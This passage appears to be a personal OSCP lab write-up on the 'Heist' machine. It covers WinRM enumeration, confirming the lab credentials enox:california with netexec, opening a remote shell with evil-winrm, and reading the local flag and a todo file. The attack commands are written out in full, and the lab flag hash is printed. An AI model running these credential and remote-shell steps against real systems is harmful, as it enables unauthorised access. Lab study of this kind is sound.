On the web app in 8080 HTTP(S), we get a 200 response code on http://192.168.247.165:5985/wsman, confirming the WinRM is accessible internally, but we’ll need credentials to do anything.

:47001 is the same thing but only open on the target’s localhost. https://morgansimonsen.com/2009/12/10/winrm-and-tcp-ports/

With enox:california credentials

netexec winrm DC01.heist.offsec -u enox -p california

WINRM       192.168.109.165 5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
WINRM       192.168.109.165 5985   DC01             [+] heist.offsec\enox:california (Pwn3d!)

Pwn3d! indicates we have remote access via winrm. We’ll continue using evil-winrm:

Exploitation with evil-winrm

evil-winrm -i DC01.heist.offsec -u enox -p california

Just like that, we have a shell! I’m actually going to exit, make a directory named scripts, a copy SauronEye into it, to easily transfer to the host. This utility will allow us to find .txt files very quickly, including the local flag.

type C:\Users\enox\Desktop\local.txt

9de76564847d8624b14b7595604ba7fd

C:\Users\enox\Desktop\todo.txt also looks interesting:

- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]

Next I’ll begin enumeration for privilege escalation in [[Enox → svc_apache $∣ E n o x - > s v c_{a} p a c h e$ ]].

Veilcat

Explorer

Latest

OSCP 🐲

Medjed

OSCP Note Template and Runbooks

5985, 47001 WinRM

With enox:california credentials

Exploitation with evil-winrm

Graph View

Table of Contents

Backlinks